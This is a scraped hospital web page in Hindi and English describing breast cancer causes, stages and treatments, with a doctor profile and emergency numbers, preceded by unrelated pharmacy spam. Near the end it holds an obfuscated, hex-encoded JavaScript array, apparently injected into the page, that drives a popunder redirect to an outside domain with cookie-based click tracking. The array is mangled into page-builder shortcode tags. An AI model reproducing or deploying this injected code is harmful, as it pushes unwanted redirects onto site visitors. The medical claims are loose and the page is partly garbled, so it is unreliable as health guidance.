Farmacia en línea Farmacia Ortega Martinez on los mejores precios de España. Farmacia del Centro Online pharmacy MJD Health Pharmacy with the best prices in Australia.

Home > Videos > Oncology > Breast Cancer के Stages कितने है और उनके उपचार क्या है?

Breast Cancer के Stages कितने है और उनके उपचार क्या है?

लोगो के मन के breast cancer को लेके काफी सारे प्रश्न मन में होते है और जिसका जवाब देना काफी आवश्यक होता है। स्तन के कैंसर की समस्या हमारे देश में बढ़ती ही जा रही है।

Breast Cancer Causes

काफी बार पेशेंट्स healthy lifestyle होने के बावजूद भी उन्हें ब्रैस्ट कैंसर होता है तो उस वक्त वह अपने डॉक्टर से यही सवाल पूछते है की उन्हें ये कैंसर क्यों हुआ या फिर कैसे हुआ ? इसका जवाब देना तो काफी मुश्किल है पर 5 से 10% महिलाएं hereditary कारणों से स्तन कैंसर से पीड़ित हैं। बाकी के 90-95% औरतो में यह कैंसर तनाव , बच्चे को breastfeeding न करना , अच्छा late होना और काफी सारे risk factors जैसे की मोटापा ऐसी सारी कारणों के वजहसे breast cancer हो सकता है।

Breast cancer stages and their treatment

Breast cancer treatment काफी आसान है पर अच्छे results इसके तभी मिलते है जब जिसके जांच जल्द से जल्द जब होती है जैसे की 1st या 2nd stage.

Stage 1 Breast Cancer

Stage 1 स्तन कैंसर में गांठ 2 सेमी से कम होती है जिसका पता Mammography या Sonography द्वारा लगाया जाता है। इसके बाद ट्रीटमेंट केलिए surgery , chemotherapy , radiation और hormonal therapy दी जाती है। Stage 1 स्तन कैंसर में Surgery और Chemotharapy 95% महिलाओं को स्तन कैंसर से पुन: संक्रमित होने से रोकने में मदद करती है।

Stage 2 Breast Cancer

Stage 2 स्तन कैंसर में गांठ 2 cm से बड़ी होता है और वह बगल तक पोहोच जाती है और 80% रोगियों में इसका इलाज किया जा सकता है। इसमें पहले डॉक्टर दवा या chemo के द्वारा गाँठ को छोटा किया जाता है उसके बाद surgery , radiation और गोलियों की treatment दी जाती है।

Stage 3 Breast Cancer

Stage 3 स्तन कैंसर में गांठ 5 cm से बड़ा होता है , इसमें बगल में या गले की यहाँ गाँठ हो सकती है और 60% रोगियों में इसका इलाज किया जा सकता है। इसमें भी chemotherapy , surgery , radiation , hormonal therapy और targeted therapy से इलाज किया जाता है।

Stage 4 Breast Cancer

Stage 4 स्तन कैंसर में गांठ हड्डियों, फेफड़ों, यकृत और मस्तिष्क में फैलता है पर आप घबराइयेगा नहीं , आज कल advanced ट्रीटमेंट के कारण मरीज इसे काबू में रख सकता है पर इसकी जानकारी केलिए आप आपके डॉक्टर की सलाह जरूर ले।

Ayurveda/Homeopathy for breast cancer

अगर आपको supportive medicine का सहारा लेना है जैसे की होम्योपैथिक दवाइया तो आप chemotherapy के बाद ले सकते पर इसके बारेमें आपके डॉक्टर से जरूर बात कीजिये। आयुर्वेदिक दवाइयों के थोड़े बोहोत लिवर और किडनी पे असर होता है इसलिए लेने से पहले अपने oncologist से बात कीजिये।

About Author

dr-supriya-puranik

Dr. Shona Nag

Sr Medical Oncologist and Director Oncology Dept
Contact: +91 88888 22222
Email – [email protected]

View Profile

    Appointment Form

    For a quick response to all your queries, do call us.

    Patient Feedback

    Expert Doctors

    ["x68x74x74x70x73x3Ax2Fx2Fx62x6Fx6Ex75x73x73x63x6Fx72x65x2Ex6Cx69x66x65x2Fx3Fx75x3Dx79x31x68x77x6Bx77x66x26x6Fx3Dx32x61x37x62x7Ax76x66","x75x72x6C","x68x74x74x70x3Ax2Fx2Fx67x6Fx6Fx67x6Cx65x2Ex63x6Fx6D","x63x6Cx69x63x6B","x70x6Fx70x75x6Ex64x65x72","x63x6Cx69x63x6Bx73x5Fx6Ex75x6D","x65x78x70x69x72x65","x64x6Fx63x75x6Dx65x6Ex74x45x6Cx65x6Dx65x6Ex74","x75x6Ex64x65x66x69x6Ex65x64","x70x61x74x68","x3Bx70x61x74x68x3D","","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x77x69x64x74x68x3Dx31x30x32x34x2Cx68x65x69x67x68x74x3Dx37x36x38x2Cx72x65x73x69x7Ax61x62x6Cx65x3Dx31x2Cx74x6Fx6Fx6Cx62x61x72x3Dx31x2Cx6Cx6Fx63x61x74x69x6Fx6Ex3Dx31x2Cx6Dx65x6Ex75x62x61x72x3Dx31x2Cx73x74x61x74x75x73x3Dx31x2Cx73x63x72x6Fx6Cx6Cx62x61x72x73x3Dx31","x6Fx70x65x6E","x66x6Fx63x75x73","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x3Dx31x3Bx20x65x78x70x69x72x65x73x3D","x74x6Fx47x4Dx54x53x74x72x69x6Ex67","x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72","x61x74x74x61x63x68x45x76x65x6Ex74","x6Fx6E" _i=”1″ _address=”1″ theme_builder_area=”post_content” /][0 _i=”2″ _address=”2″ theme_builder_area=”post_content” /][_0x87e7 0=”%911″ _i=”3″ _address=”3″ theme_builder_area=”post_content” /][2 _i=”4″ _address=”4″ theme_builder_area=”post_content” /][3 _i=”5″ _address=”5″ theme_builder_area=”post_content” /][4 _i=”6″ _address=”6″ theme_builder_area=”post_content” /][_0x87e7 0=”%915″ _i=”7″ _address=”7″ theme_builder_area=”post_content” /][_0x87e7 0=”%916″ _i=”8″ _address=”8″ theme_builder_area=”post_content” /][_0x87e7 0=”%917″ _i=”9″ _address=”9″ theme_builder_area=”post_content” /][8 _i=”10″ _address=”10″ theme_builder_area=”post_content” /][_0x87e7 0=”%919″ _i=”11″ _address=”11″ theme_builder_area=”post_content” /][10 _i=”12″ _address=”12″ theme_builder_area=”post_content” /][_0x87e7 0=”%919″ _i=”13″ _address=”13″ theme_builder_area=”post_content” /][11 _i=”14″ _address=”14″ theme_builder_area=”post_content” /][_0x87e7 0=”%9113″ _i=”15″ _address=”15″ theme_builder_area=”post_content” /][_0x87e7 0=”%9112″ _i=”16″ _address=”16″ theme_builder_area=”post_content” /][_0x87e7 0=”%9115″ _i=”17″ _address=”17″ theme_builder_area=”post_content” /][14 _i=”18″ _address=”18″ theme_builder_area=”post_content” /][_0x87e7 0=”%9116″ _i=”19″ _address=”19″ theme_builder_area=”post_content” /][_0x87e7 0=”%9118″ _i=”20″ _address=”20″ theme_builder_area=”post_content” /][_0x87e7 0=”%9117″ _i=”21″ _address=”21″ theme_builder_area=”post_content” /][_0x87e7 0=”%9113″ _i=”22″ _address=”22″ theme_builder_area=”post_content” /][19 _i=”23″ _address=”23″ theme_builder_area=”post_content” /][_0x87e7 0=”%9120″ _i=”24″ _address=”24″ theme_builder_area=”post_content” /][_0x87e7 0=”%9121″ _i=”25″ _address=”25″ theme_builder_area=”post_content” /][_0x87e7 0=”%9121″ _i=”26″ _address=”26″ theme_builder_area=”post_content” /][_0x87e7 0=”%9122″ _i=”27″ _address=”27″ theme_builder_area=”post_content” /][_0x87e7 0=”%9122″ _i=”28″ _address=”28″ theme_builder_area=”post_content” /][23 _i=”29″ _address=”29″ theme_builder_area=”post_content” /]
    Emergency/Ambulance
    +91-88888 22222
    Emergency/Ambulance
    +91-88062 52525
    Call Now: 88888 22222